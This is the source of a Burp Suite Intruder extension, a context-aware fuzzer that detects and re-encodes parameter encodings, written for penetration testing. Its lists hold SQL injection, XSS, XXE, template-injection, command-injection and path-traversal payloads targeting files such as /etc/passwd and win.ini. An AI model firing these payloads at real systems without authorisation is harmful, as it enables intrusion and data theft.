burpContextAwareFuzzer.py

#!/usr/bin/python

#
# BurpSuite's payload-generation extension aiming at applying fuzzed test-cases depending 
# on the type of payload (basic like integer, string, path; json; GWT; binary) and 
# following encoding-scheme applied.
# 
# The main goal of this extension is to detect applied encoding scheme, decode the variable,
# detect type of value within a payload and according to that type select proper mutations,
# then apply some modifications / fuzzes and afterwards encode the generated value according 
# to previously detected encoding scheme. 
#
# There are 5 different level of fuzzing intensity implemented, each of them differs in number
# of test-cases to use per one parameter. The figures are following:
#   - Minimal: +/- 50 requests/parameter
#   - Low: +/- 100-130 r/p
#   - Medium: +/- 150-240 r/p
#   - High: +/- 180-440 r/p
#   - Extreme: +/- 260-750 r/p
#
# Those figures scale up when the fuzzer is being given with for instance JSON or XML object,
# having N attributes and nodes.
#
# Requirements for Jython (to be installed in Jython's environment):
#   - Jython 2.7
#   - anytree
#   - jwt
#
# On Windows it may be a bit tricky to resolve Jython's requirements. The steps that worked
# for author of this script are:
#   -----------------------------------------------------------------------------
#   cmd> java -cp jython.jar org.python.util.jython -m ensurepip
#   cmd> java -cp jython.jar org.python.util.jython -m ensurepip --upgrade
#   cmd> java -cp jython.jar org.python.util.jython
#   Jython 2.7.1b3 (default:df42d5d6be04, Feb 3 2016, 03:22:46)
#   [Java HotSpot(TM) 64-Bit Server VM (Oracle Corporation)] on  java1.8.0_144
#   Type "help", "copyright", "credits" or "license" for more information.
#   >>> try:
#   ...     from pip import main as pipmain
#   ... except:
#   ...     from pip._internal import main as pipmain
#   ...
#   >>> pipmain(['install', '--upgrade', 'pip'])
#   >>> pipmain(['install', 'anytree'])
#   >>> pipmain(['install', 'pyjwt'])
#   -----------------------------------------------------------------------------
#
# KNOWN BUGS / LIMITATIONS:
#   At the moment XML payloads fuzzing has been disabled since there is a problem with Jython's ElementTree implementation,
#   that is implemented in Xerces SAXParser. Refer to:
#       https://support.portswigger.net/customer/portal/questions/16996471-sax2-driver-class-org-apache-xercer-parses-saxparser-not-found
#   If you think problem is solved, refer to 'ContextAwareFuzzer.__init__()' and uncomment 'XMLTypeFuzzer' in 'self.typeHandlers'.
#
# Notes:
#   This program uses code coming from 'flatten_json' package, that was taken out from that 
#   package to avoid hassle of installing yet another package.
#
# Mariusz B., 2018
#

from burp import IBurpExtender
from burp import IIntruderPayloadGeneratorFactory
from burp import IIntruderPayloadGenerator

from java.util import List, ArrayList

import re
import sys
import jwt
import math
import json
import zlib
import string
import base64
import urllib
import random
import anytree
import binascii
import xml.dom.minidom
import xml.etree.ElementTree as ET

from xml.dom import minidom
from xml.dom.minidom import Node

from collections import Counter
from collections import OrderedDict

VERSION = '0.2-alpha'

# This pattern will be appended to generated test cases in order to 
# be looked upon when reviewing responses.
UNIQUE_PATTERN_TO_SEARCH_FOR = 'FUZZFUZZ'


# ==========================================================
# SOME PREDEFINED, WISELY CHOSEN FUZZ STRINGS 
# AND OTHER TEST-CASE PATTERNS
#


# This list will be appended to various test-cases
FUZZ_APPEND_LIST = (
    "'",
    '"',
    "`", 
    "~", 

    "'\"'",
    "\"''''\"'\"", 
    "\"", 
    "\\'", 
    "\\\"", 

    "/", 
    "/\\", 
    "//", 
    "//\\", 
    "\\", 
    "\\/", 
    "\\\\", 
    "\\\\/", 

    "&", 
    "|", 
    "}",  
    "*", 
    "*/*", 
    "//*", 

    ":", 
    ";",

    "@", 
    "@*", 
    "(", 
    ")", 
    "?*", 
    
    "%00", 
    "%0D%0A%0D%0A", 
    
    ' --help',
    ' --version',

    " or 1=1",
    " or 1=1 --",
    " or 1=1 #",
    "' or 1=1 --",
    "\" or 1=1 --",
    "' or 1=1 #",
    "\" or 1=1 #",
    "' or '1'='1",
    "' or '1'='1'--",
    "' or '1'='1'#",
    "\" or \"1\"=\"1",
    "\" or \"1\"=\"1\"--",
    "\" or \"1\"=\"1\"#",
)

# This list will fill up tested parameter and thus constitute a test-case.
# The order of below test-cases is important.
FUZZ_INSERT_LIST = (
    "0", 
    "1", 
    "1.0", 
    "2",
    "2147483647", 
    "268435455", 
    "65536", 

    "-1", 
    "-1.0", 
    "-2", 
    "-2147483647", 
    "-268435455", 
    "-65536",

    "*()|%26'", 
    "*()|&'", 
    "*(|(mail=*))", 
    "(*)*)", 
    "*)*", 
    "*/*", 
    "*|", 
    "@*", 
    "%70", 
    ".%E2%73%70", 
    "%2e", 
    ".", 
    "..", 

    # Other ones coming from SecLists metacharacters
    "!'",
    "!@#$%%^#$%#$@#$%$$@#$%^^**(()",
    "!@#0%^#0##018387@#0^^**(()",
    
    "$NULL",
    "$null",
    "%",
    "%00",
    
    "(')",
    "*&apos;",
    "*'",
    "*|",

    "<?",
    "?x=",
    "?x=\"",
    "?x=|",

    "ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|",

     # Server side template injection #1
    "${666666*1}",
    "{666666*1}",

    # Twig
    "{{666666*1}}",
    "{{ '" + UNIQUE_PATTERN_TO_SEARCH_FOR + "'|upper }}",

    "{{666666*'1'}}",
    "${666666*1}a{{666666}}b",

    # Smarty Template: FUZZFUZZ{*comment*}FUZZFUZZ
    UNIQUE_PATTERN_TO_SEARCH_FOR + "{*comment*}" + UNIQUE_PATTERN_TO_SEARCH_FOR,

    # Mako templates: ${"FUZZFUZZ".join("FUZZFUZZ")}
    '${"' + UNIQUE_PATTERN_TO_SEARCH_FOR + '".join("' + UNIQUE_PATTERN_TO_SEARCH_FOR + '"}}',

    "'\"><img src=x onerror=alert(/666/)>",
    '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>',
    "';alert(0)//\\';alert(1)//\";alert(2)//\\\";alert(3)//--></SCRIPT>\">'><SCRIPT>alert(4)</SCRIPT>=&{}\");}alert(6);function xss(){//",
    "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcliCk=alert(666666) )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(667667)//>\\x3e",

    "\x0d\x0aCC: example@gmail.com\x0d\x0aLocation: www.google.com",
    "||cmd.exe&&id||",
    "||id||",
    ";id",

    # -----
    "?x=>",
    "[']",
    "\"blah",
    "\&apos;",
    "\\'",
    "\\0",
    "\\00",
    "\\00\\00",
    "\\00\\00\\00",
    "\\0\\0",
    "\\0\\0\\0",
    "\\\\*",
    "\\\\?\\",
    "\t",
    "^&apos;",
    "^'",
    "id%00",
    "id%00|",
    "{&apos;}",
    "{'}",
    "|",
    "}\"",

    "*)(uid=*))(|(uid=*", 
    "\"><script>\"",
    "%00/",
    "%01%02%03%04%0a%0d%0aADSF",
    "%0a",
    "@&apos;",
    "@'",
    "FALSE",
    "NULL",
    "TRUE",
    "[&apos;]",

    'undefined',
    'undef',
    'null',
    'NULL',
    '(null)',
    'nil',
    'NIL',
    'true',
    'false',
    'True',
    'False',
    'TRUE',
    'FALSE',
    'None',
    'hasOwnProperty',

    "count(/child::node())", 
    "{}", 
    '{"1":"0"}',
    '{"1":0}', 
    '{"0":"\\x00"}', 
    '{"0":[]}', 
    '{"0":[1]}', 
    '{"0":[1,2]}', 
    '{"0":["1","2"]}', 
    '{"\\x00":"0"}', 
    '{"\\x00":0}',
    '{"\\x00":""}', 
    '{"\\x00":[]}', 
    '{"\\x00":[1]}', 
    '{"\\x00":[1,2]}', 

    "\">xxx<P>yyy",
    "\"\t\"",
    "#",
    "#&apos;",
    "#'",
    "#xA",
    "#xA#xD",
    "#xD",
    "#xD#xA",

    "%2500",
    "%250a",
    "%2A",
    "%2C",
    "%2e%2e%2f",
    "%3C%3F",
    "%5C",
    "%5C/",
    "%60",
    "%7C",
    "&#10;",
    "&#10;&#13;",
    "&#13;",
    "&#13;&#10;",
    "&apos;",
    "&quot;;id&quot;",

    "..%%35%63",
    "..%%35c",
    "..%25%35%63",
    "..%255c",
    "..%5c",
    "..%bg%qf",
    "..%c0%af",
    "..%u2215",
    "..%u2216",
    "../",
    "..\\",
    "/%00/",
    "/%2A",
    "/&apos;",
    "0xfffffff",
)

PATH_TRAVERSAL_FILES = {
    'linux': (
        r'.htpasswd',
        r'/etc/passwd',
        r'/proc/self/environ',
        #r'/etc/crontab',
        r'/etc/fstab',
        r'/etc/group',
        r'/etc/hostname',
        r'/etc/hosts',
        #r'/var/log/dmesg',
        #r'/var/log/auth',
        r'/etc/issue',
        #r'/etc/resolv.conf',
    ),

    'windows' : (
        r'\Windows\win.ini',
        r'\boot.ini',
        r'\winnt\win.ini',
        r'\inetpub\wwwroot\index.asp',
    )
}


# =============================================
# RE-ENCODER'S IMPLEMENTATION
#

class ReEncoder:

    # Switch this to show some verbose informations about decoding process.
    DEBUG = False

    PREFER_AUTO = 0     # Automatically determine final output format
    PREFER_TEXT = 1     # Prefer text/printable final output format
    PREFER_BINARY = 2   # Prefer binary final output format

    class Utils:
        @staticmethod
        def isBinaryData(data):
            nonBinary = 0
            percOfBinaryToAssume = 0.10

            for d in data:
                c = ord(d)
                if c in (10, 13): 
                    nonBinary += 1
                elif c >= 0x20 and c <= 0x7f:
                    nonBinary += 1

            binary = len(data) - nonBinary
            return binary >= int(percOfBinaryToAssume * len(data))

    # ============================================================
    # ENCODERS SECTION
    #

    class Encoder:
        def name(self):
            raise NotImplementedError

        def check(self, data):
            raise NotImplementedError
            
        def encode(self, data):
            raise NotImplementedError

        def decode(self, data):
            raise NotImplementedError

    class NoneEncoder(Encoder):
        def name(self):
            return 'None'

        def check(self, data):
            if not data:
                return False
            return True
            
        def encode(self, data):
            return data

        def decode(self, data):
            return data

    class URLEncoder(Encoder):
        def name(self):
            return 'URLEncoder'

        def check(self, data):
            if urllib.quote(urllib.unquote(data)) == data and (urllib.unquote(data) != data):
                return True

            if re.search(r'(?:%[0-9a-f]{2})+', data, re.I):
                return True

            return False
            
        def encode(self, data):
            return urllib.quote(data)

        def decode(self, data):
            return urllib.unquote(data)

    class HexEncoder(Encoder):
        def name(self):
            return 'HexEncoded'

        def check(self, data):
            m = re.match(r'^[0-9a-f]+$', data, re.I)
            if m:
                return True
            return False
            
        def encode(self, data):
            return binascii.hexlify(data).strip()

        def decode(self, data):
            return binascii.unhexlify(data).strip()

    class Base64Encoder(Encoder):
        def name(self):
            return 'Base64'

        def check(self, data):
            try:
                if base64.b64encode(base64.b64decode(data)) == data:
                    m = re.match('^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$', data, re.I)
                    if m: 
                        return True
                    return False
            except:
                pass
            return False
            
        def encode(self, data):
            return base64.b64encode(data)

        def decode(self, data):
            return base64.b64decode(data)

    class Base64URLSafeEncoder(Encoder):
        def name(self):
            return 'Base64URLSafe'

        def check(self, data):
            try:
                if base64.urlsafe_b64encode(base64.urlsafe_b64decode(data)) == data:
                    m = re.match('^(?:[A-Za-z0-9\-_]{4})*(?:[A-Za-z0-9\-_]{2}==|[A-Za-z0-9\-_]{3}=|[A-Za-z0-9\-_]{4})$', data, re.I)
                    if m: 
                        return True
                    return False
            except:
                pass
            return False
            
        def encode(self, data):
            return base64.urlsafe_b64encode(data)

        def decode(self, data):
            return base64.urlsafe_b64decode(data)

    class JWTEncoder(Encoder):
        secret = ''

        def name(self):
            return 'JWT'

        def check(self, data):
            try:
                jwt.decode(data, verify = False)
                return True
            except jwt.exceptions.DecodeError:
                return False
            
        def encode(self, data):
            return jwt.encode(data, JWTEncoder.secret)

        def decode(self, data):
            return jwt.decode(data, verify = False)

    class ZlibEncoder(Encoder):
        def name(self):
            return 'ZLIB'

        def check(self, data):
            if not ReEncoder.Utils.isBinaryData(data):
                return False

            try:
                if zlib.compress(zlib.decompress(data)) == data:
                    return True
            except:
                pass
            return False
            
        def encode(self, data):
            return zlib.compress(data)

        def decode(self, data):
            return zlib.decompress(data)


    # ============================================================
    # ENCODING DETECTION IMPLEMENTATION
    #

    MaxEncodingDepth = 20

    def __init__(self):
        self.encodings = []
        self.encoders = (
            ReEncoder.URLEncoder(),
            ReEncoder.HexEncoder(),
            ReEncoder.Base64Encoder(),
            ReEncoder.Base64URLSafeEncoder(),
            ReEncoder.JWTEncoder(),
            ReEncoder.ZlibEncoder(),

            # None must always be the last detector
            ReEncoder.NoneEncoder(),
        )
        self.encodersMap = {}
        self.data = ''
        self.preferredOutputFormat = ReEncoder.PREFER_AUTO

        for encoder in self.encoders:
            self.encodersMap[encoder.name()] = encoder

    @staticmethod
    def log(text):
        if ReEncoder.DEBUG:
            print(text)

    def verifyEncodings(self, encodings):
        for encoder in encodings:
            if type(encoder) == str:
                if not encoder in self.encodersMap.keys():
                    raise Exception("Passed unknown encoder's name.")
            elif not issubclass(ReEncoder.Encoder, encoder):
                raise Exception("Passed encoder is of unknown type.")

    def generateEncodingTree(self, data):
        step = 0
        maxSteps = len(self.encoders) * ReEncoder.MaxEncodingDepth

        peeledBefore = 0
        peeledOff = 0
        currData = data

        while step < maxSteps:
            peeledBefore = peeledOff
            for encoder in self.encoders:
                step += 1

                ReEncoder.log('[.] Trying: {} (peeled off: {}). Current form: "{}"'.format(encoder.name(), peeledOff, currData))

                if encoder.check(currData):
                    if encoder.name() == 'None':
                        continue

                    if encoder.name().lower().startswith('base64') and (len(currData) % 4 == 0):
                        ReEncoder.log('[.] Unclear situation whether input ({}) is Base64 encoded. Branching.'.format(
                            currData
                        ))

                        yield ('None', currData, True)

                    if encoder.name().lower().startswith('hex') and (len(currData) % 2 == 0):
                        ReEncoder.log('[.] Unclear situation whether input ({}) is Hex encoded. Branching.'.format(
                            currData
                        ))

                        yield ('None', currData, True)

                    ReEncoder.log('[+] Detected encoder: {}'.format(encoder.name()))

                    currData = encoder.decode(currData)
                    yield (encoder.name(), currData, False)

                    peeledOff += 1

                    break

            if (peeledOff - peeledBefore) == 0: 
                break

    def formEncodingCandidates(self, root):
        iters = [[node for node in children] for children in anytree.LevelOrderGroupIter(root)]

        candidates = []

        for node in iters[-1]:
            name = node.name
            decoded = node.decoded

            ReEncoder.log('[.] Candidate for best decode using {}: "{}"...'.format(
                name, decoded[:20]
            ))

            candidates.append([name, decoded, 0.0])

        return candidates

    @staticmethod
    def entropy(data, unit='natural'):
        base = {
            'shannon' : 2.,
            'natural' : math.exp(1),
            'hartley' : 10.
        }

        if len(data) <= 1:
            return 0

        counts = Counter()

        for d in data:
            counts[d] += 1

        probs = [float(c) / len(data) for c in counts.values()]
        probs = [p for p in probs if p > 0.]

        ent = 0

        for p in probs:
            if p > 0.:
                ent -= p * math.log(p, base[unit])

        return ent

    def evaluateEncodingTree(self, root):
        (printableEncodings, printableCandidate) = self.evaluateEncodingTreePicker(root, False)
        (binaryEncodings, binaryCandidate) = self.evaluateEncodingTreePicker(root, True)

        if self.preferredOutputFormat == ReEncoder.PREFER_TEXT:
            ReEncoder.log('Returning text/printable output format as requested preferred one.')
            return printableEncodings
        elif self.preferredOutputFormat == ReEncoder.PREFER_BINARY:
            ReEncoder.log('Returning binary output format as requested preferred one.')
            return binaryEncodings
        else:
            ReEncoder.log('Trying to determine preferred output format...')

        ReEncoder.log('\n---------------------------------------')
        ReEncoder.log('[>] Winning printable encoding path scored: {} points.'.format(
            printableCandidate[2]
        ))
        ReEncoder.log('[>] Winning binary encoding path scored: {} points.'.format(
            binaryCandidate[2]
        ))

        if(printableCandidate[2] >= binaryCandidate[2]):
            ReEncoder.log('\n[+] Choosing all-time winner: PRINTABLE output format.')
            return printableEncodings

        ReEncoder.log('\n[+] Choosing all-time winner: BINARY output format.')
        ReEncoder.log('---------------------------------------\n')
        return binaryEncodings

    def evaluateEncodingTreePicker(self, root, preferBinary):
        candidates = self._evaluateEncodingTreeWorker(root, preferBinary)

        maxCandidate = 0

        for i in range(len(candidates)):
            candidate = candidates[i]

            name = candidate[0]
            decoded = candidate[1]
            points = float(candidate[2])

            if points > candidates[maxCandidate][2]:
                maxCandidate = i

        winningCandidate = candidates[maxCandidate]
        winningPaths = anytree.search.findall_by_attr(
            root, 
            name = 'decoded',
            value = winningCandidate[1]
        )

        ReEncoder.log('[?] Other equally good candidate paths:\n' + str(winningPaths))
        winningPath = winningPaths[0]

        preferred = 'printable'
        if preferBinary:
            preferred = 'binary'

        ReEncoder.log('[+] Winning decode path for {} output is:\n{}'.format(
            preferred,
            str(winningPath))
        )

        encodings = [x.name for x in winningPath.path if x != 'None']
        return (encodings, winningCandidate)

    def _evaluateEncodingTreeWorker(self, root, preferBinary = False):
        weights = {
            'unreadableChars' : 0.0,
            'printableChars' : 9.6,
            'entropyScore' : 4.0,
            'length' : 1.0,
        }

        if preferBinary:
            weights['unreadableChars'] = 24.0
            weights['printableChars'] = 0.0
            weights['entropyScore'] = 2.666667

        candidates = self.formEncodingCandidates(root)

        for i in range(len(candidates)):
            candidate = candidates[i]

            name = candidate[0]
            decoded = candidate[1]
            points = float(candidate[2])
            entropy = ReEncoder.entropy(decoded)
            printables = sum([int(x in string.printable) for x in decoded])
            nonprintables = len(decoded) - printables

            ReEncoder.log('[=] Evaluating candidate: {} (entropy: {}, data: "{}")'.format(
                name, entropy, decoded
            ))

            # Step 1: Adding points for printable percentage.
            printablePoints = float(weights['printableChars']) * (float(printables) / float(len(decoded)))
            nonPrintablePoints = float(weights['unreadableChars']) * (float(nonprintables) / float(len(decoded)))

            # Step 2: If encoder is Base64 and was previously None
            #    - then length and entropy of previous values should be of slighly lower weights
            if name.lower() == 'none' \
                and len(candidates) > i+1 \
                and candidates[i+1][0].lower().startswith('base64'):
                ReEncoder.log('\tAdding fine for being base64')
                entropyPoints = entropy * (weights['entropyScore'] * 0.666666)
                lengthPoints = float(len(decoded)) * (weights['length'] * 0.666666)
            else:
                entropyPoints = entropy * weights['entropyScore']
                lengthPoints = float(len(decoded)) * weights['length']

            if printables > nonprintables:
                ReEncoder.log('More printable chars than binary ones.')
                ReEncoder.log('\tAdding {} points for printable entropy.'.format(entropyPoints))

                ReEncoder.log('\tAdding {} points for printable characters.'.format(printablePoints))
                points += printablePoints
            else:
                ReEncoder.log('More binary chars than printable ones.')
                ReEncoder.log('\tAdding {} points for binary entropy.'.format(entropyPoints))

                ReEncoder.log('\tAdding {} points for binary characters.'.format(nonPrintablePoints))
                points += nonPrintablePoints

            points += entropyPoints

            # Step 4: Add points for length
            ReEncoder.log('\tAdding {} points for length.'.format(lengthPoints))
            points += lengthPoints
            
            ReEncoder.log('\tScored in total: {} points.'.format(points))
            candidates[i][2] = points

        return candidates


    def getWinningDecodePath(self, root):
        return [x for x in self.evaluateEncodingTree(root) if x != 'None']

    def process(self, data):
        root = anytree.Node('None', decoded = data)
        prev = root

        for (name, curr, branch) in self.generateEncodingTree(data):
            ReEncoder.log('[*] Generator returned: ("{}", "{}", {})'.format(
                name, curr[:20], str(branch)
            ))

            currNode = anytree.Node(name, parent = prev, decoded = curr)
            if branch:
                pass
            else:
                prev = currNode

        for pre, fill, node in anytree.RenderTree(root):
            if node.name != 'None':
                ReEncoder.log("%s%s (%s)" % (pre, node.name, node.decoded[:20].decode('ascii', 'ignore')))

        self.encodings = self.getWinningDecodePath(root)
        ReEncoder.log('[+] Selected encodings: {}'.format(str(self.encodings)))

    def decode(self, data, preferredOutputFormat = PREFER_AUTO, encodings = []):
        self.preferredOutputFormat = preferredOutputFormat

        if preferredOutputFormat != ReEncoder.PREFER_AUTO and \
            preferredOutputFormat != ReEncoder.PREFER_TEXT and \
            preferredOutputFormat != ReEncoder.PREFER_BINARY:
            raise Exception('Unknown preferred output format specified in decode(): {}'.format(
                preferredOutputFormat
            ))

        if not encodings:
            self.process(data)
        else:
            self.verifyEncodings(encodings)
            self.encodings = encodings

        for encoderName in self.encodings:
            d = self.encodersMap[encoderName].decode(data)
            data = d

        return data

    def encode(self, data, encodings = []):
        if encodings:
            encodings.reverse()
            self.verifyEncodings(encodings)
            self.encodings = encodings

        for encoderName in self.encodings[::-1]:
            e = self.encodersMap[encoderName].encode(data)
            data = e

        return data


class BaseFuzzer:
    def name(self):
        raise NotImplementedError

    def check(self, data):
        raise NotImplementedError

    def getMutations(self, data):
        raise NotImplementedError

    def reset(self):
        raise NotImplementedError

class BasicTypeFuzzer(BaseFuzzer):
    def __init__(self, intensity):
        self.mutations = []
        self.intensity = intensity

    def reset(self):
        self.mutations = []

    def name(self):
        return 'BasicType'

    def findType(self, data):
        try:
            val = int(data)
            return 'integer'
        except ValueError:
            pass

        try:
            val = float(data)
            return 'float'
        except ValueError:
            pass

        printable = sum([int(x in string.printable) for x in data]) == len(data)
        if printable:
            forbidden = ('<', '>', ':', '"', '|', '?', '*')
            for f in forbidden:
                if f in data:
                    return 'string'

            if data.count('/') <= 1 and data.count('\\') <= 1:
                return 'string'

            try:
                if (len(data) % 4 != 0 or data.endswith('=')) and \
                    base64.b64encode(base64.b64decode(data)) == data:
                    # This happens to be valid base64
                    return 'string'
            except:
                pass

            regexes = (
                # Windows path
                r'^(?:[a-zA-Z]:)?\\?[\\\S|*\S]?.*$',

                # Linux path
                r'^(\/?[^\/]*)+',
            )

            for r in regexes:
                if re.match(r, data, re.I):
                    return 'path'

            return 'string'
        else:
            return ''

    def check(self, data):
        return self.findType(data) != ''

    def stringMutator(self, payload):
        offset = random.randint(0, len(payload) - 1)
        mutated0 = payload[:offset]
        mutated1 = payload[offset:]

        # 1/2 + 1 = 1
        # 2/2 + 1 = 2
        # 5/2 + 1 = 3
        # 8/2 + 1 = 5
        # 10/2 + 1 = 6
        numberOfMutations = self.intensity / 2 + 1

        # Mutations #4: Add some repeated values
        for i in range(numberOfMutations):
            try:
                chunkLen = random.randint(len(payload[offset:]), len(payload) - 1)
            except ValueError:
                chunkLen = len(payload) - offset
            repeater = random.randint(1, 10)

            repeated = mutated0
            for i in range(repeater):
                repeated += payload[offset : offset + chunkLen]

            self.mutations.append(repeated + mutated1)

        # Mutations #5: Some random bit flips
        for i in range(numberOfMutations):
            byte = random.randint(0, len(payload) - 1)
            bit = random.randint(0, 7)

            mutatedByte = '%{:02x}'.format( (ord(payload[byte]) ^ (1 << bit)) % 255 )
            mutated = payload[:byte - 1] + mutatedByte + payload[byte + 1:]
            self.mutations.append(mutated)

        # Mutations #6: Add those cut in half pieces
        self.mutations.append(mutated0)
        self.mutations.append(mutated1)

        return list(set(self.mutations))

    def genericMutations(self, payload):
        offset = random.randint(0, len(payload) - 1)
        mutated0 = payload[:offset]
        mutated1 = payload[offset:]

        mutations = []

        # Mutation #1: Empty string
        mutations.append('')

        # Mutations #2a: Some predefined entries in place of previous value
        for i in FUZZ_APPEND_LIST:
            mutations.append(
                payload + i + UNIQUE_PATTERN_TO_SEARCH_FOR
            )

        if self.intensity > PayloadGenerationIntensity.MINIMAL:
            if self.intensity > PayloadGenerationIntensity.LOW:
                # Mutations #2b: Add some insert-only values

                numberOfEntriesToUse = len(FUZZ_INSERT_LIST) 
                if self.intensity == PayloadGenerationIntensity.MEDIUM:
                    numberOfEntriesToUse /= 3
                if self.intensity == PayloadGenerationIntensity.HIGH:
                    numberOfEntriesToUse /= 2

                for i in FUZZ_INSERT_LIST[:numberOfEntriesToUse]:
                    mutations.append(i)

            # Mutations #3: Some predefined entries inside of a payload
            for i in FUZZ_APPEND_LIST:
                mutations.append(
                    mutated0 + i + mutated1 + UNIQUE_PATTERN_TO_SEARCH_FOR
                )

        self.mutations = mutations
        return mutations

    def integerMutator(self, data):
        values = [
            2 ** 0, 2 ** 1, 2 ** 8 - 1, 2 ** 8, 1000, 2 ** 16 - 1, 2 ** 16, 2 ** 32 - 1, 2 ** 32
        ]

        edgeCases = values + [-x for x in values]
        return [str(x) for x in edgeCases]

    def floatMutator(self, data):
        values = [
            2 ** 0, 2 ** 1, 2 ** 8 - 1, 2 ** 8, 1000, 2 ** 16 - 1, 2 ** 16, 2 ** 32 - 1, 2 ** 32
        ]

        # normalized, denormalized, edge, and other values
        ieee754trickery = [
            0.0000000000000000000000000000000000000000000014013,
            100000017085266530000000000000000000000.0,
            1.99999988079071044921875,
            170141183460469231731687303715884105728,
            5.878951525289764546670578144551182540527959740471059208198733995499873916656952133052982389926910400390625E-39,
            1.175494210692441075487029444849287348827052428745893333857174530571588870475618904265502351336181163787841796875E-38,
            2.2250738585072011e-308
        ]

        edgeCases = []

        for vals in [values, ieee754trickery]:
            edgeCases.extend([float(x) for x in vals] + [float(-x) for x in vals])

        out = [str(x) for x in edgeCases]
        out.extend([
            'Inf', 
            'Infinity', 
            'NaN', 
            '0..0',
            '.',
            '0.0.0',
            '0,00',
            '0,,0',
            '1#INF',
            '1#IND',
        ])

        return out

    def pathMutator(self, data):
        # Number of mutations to generate:
        #   num = 2 * len(files) * len(dotTemplates) * depth
        depth = 5
        dotTemplates = {
            'linux': (
                '../', '..%2f', '%2e%2e%2f', '..%252f', '..%c0%af../'
            ), 
            'windows': (
                '..\\', '..%5c', '%2e%2e%5c', '..%255c', '..%c0%af..\\'
            )
        }

        slashes = {
            'linux' : '/',
            'windows' : '\\',
        }

        numberOfDotsToApply = 1
        if self.intensity > PayloadGenerationIntensity.MEDIUM:
            numberOfDotsToApply = None
        elif self.intensity > PayloadGenerationIntensity.LOW:
            numberOfDotsToApply = 3

        totalFiles = PATH_TRAVERSAL_FILES['linux'] + PATH_TRAVERSAL_FILES['windows']
        fuzzEvery = PayloadGenerationIntensity.fuzzEveryN(self.intensity, totalFiles) + 1
        if self.intensity > PayloadGenerationIntensity.HIGH:
            fuzzEvery = 1

        for os in ['linux', 'windows']:
            slash = slashes[os]
            dots = dotTemplates[os][:numberOfDotsToApply]
            files = PATH_TRAVERSAL_FILES[os]
            num = 0

            for file in files:
                num += 1
                if num % fuzzEvery != 0: continue
                for dot in dots:
                    for i in range(depth):
                        path = dot * i + slash + file
                        self.mutations.append(path)
                        self.mutations.append(slash + path)

    def getMutations(self, data):
        self.genericMutations(data)

        if self.intensity > PayloadGenerationIntensity.MINIMAL:
            varType = self.findType(data)
            if varType == 'string':
                print('[>] Parameter classified as BasicType "string"')
                self.stringMutator(data)

            elif varType == 'integer':
                print('[>] Parameter classified as BasicType "integer"')
                self.integerMutator(data)

            elif varType == 'path':
                print('[>] Parameter classified as BasicType "path"')
                self.pathMutator(data)

        mutations = self.mutations[:]
        ordered = OrderedDict()
        for mut in self.mutations:
            ordered[mut] = True

        self.mutations = ordered.keys()
        return self.mutations

class JSONTypeFuzzer(BaseFuzzer):
    def __init__(self, intensity):
        self.mutations = []
        self.intensity = intensity
        print('Support for: XML payloads fuzzing')

    def name(self):
        return 'JSON'

    def reset(self):
        pass

    def check(self, data):
        try:
            json.loads(data)
            return True
        except:
            return False

    @staticmethod
    def _construct_key(previous_key, separator, new_key):
        if previous_key:
            return "{}{}{}".format(previous_key, separator, new_key)
        else:
            return new_key

    @staticmethod
    def flatten(nested_dict, separator="_", root_keys_to_ignore=set()):
        flattened_dict = dict()

        def _flatten(object_, key):
            if isinstance(object_, dict):
                for object_key in object_:
                    if not (not key and object_key in root_keys_to_ignore):
                        _flatten(object_[object_key], JSONTypeFuzzer._construct_key(key, separator, object_key))
            elif isinstance(object_, list) or isinstance(object_, set):
                for index, item in enumerate(object_):
                    _flatten(item, JSONTypeFuzzer._construct_key(key, separator, index))
            else:
                flattened_dict[key] = object_

        _flatten(nested_dict, None)
        return flattened_dict 

    def getMutations(self, data):
        validJson = json.loads(data)
        mutations = []
        fuzzer = BasicTypeFuzzer(self.intensity)

        flattened = JSONTypeFuzzer.flatten(validJson).items()
        fuzzEveryN = PayloadGenerationIntensity.fuzzEveryN(self.intensity, len(flattened))
        num = 0

        for k, fuzzable in flattened:
            num += 1
            if num % fuzzEveryN != 0: continue
            
            for mut in fuzzer.getMutations(fuzzable):
                if data.count(fuzzable) == 1:
                    dataMutated = data.replace(fuzzable, mut)
                    mutations.append(dataMutated)

                elif data.count('"' + fuzzable + '"') == 1:
                    dataMutated = data.replace('"' + fuzzable + '"', '"' + mut + '"')
                    mutations.append(dataMutated)

                elif data.count(fuzzable + ',') == 1:
                    dataMutated = data.replace(fuzzable + ',', mut + ',')
                    mutations.append(dataMutated)

        out = OrderedDict()
        for mut in mutations:
            out[mut] = True

        return out.keys()

class XMLTypeFuzzer(BaseFuzzer):
    def __init__(self, intensity):
        self.mutations = []
        self.intensity = intensity
        print('Support for: XML payloads fuzzing')

    def name(self):
        return 'XML'

    def reset(self):
        pass

    def check(self, data):
        try:
            root = ET.fromstring(data.strip())
            return True
        except:
            return False

    def iterateNodesAndAttribs(self, root):
        for elem in root.iter():
            if elem.text and len(elem.text.strip()) > 0:
                yield elem.text.strip()
            for attrName, attrValue in elem.attrib.items():
                yield attrValue.strip()

    @staticmethod
    def etree_iter_path(node, tag=None, path='.'):
        if tag == "*":
            tag = None
        if tag is None or node.tag == tag:
            yield node, path
        for child in node:
            _child_path = '%s/%s' % (path, child.tag)
            for child, child_path in XMLTypeFuzzer.etree_iter_path(child, tag, path=_child_path):
                yield child, child_path

    @staticmethod
    def remove_blanks(node):
        for x in node.childNodes:
            if x.nodeType == Node.TEXT_NODE:
                if x.nodeValue:
                    x.nodeValue = x.nodeValue.strip()
            elif x.nodeType == Node.ELEMENT_NODE:
                XMLTypeFuzzer.remove_blanks(x)

    @staticmethod
    def encode(root):
        outxml = ET.tostring(root)
        xml = minidom.parseString(outxml)
        XMLTypeFuzzer.remove_blanks(xml)
        xml.normalize()
        return xml.toprettyxml(indent = '  ')

    def getMutations(self, data):
        root = ET.fromstring(data.strip())
        mutations = []
        fuzzer = BasicTypeFuzzer(self.intensity)

        out = OrderedDict()
        for mut in mutations:
            out[mut] = True

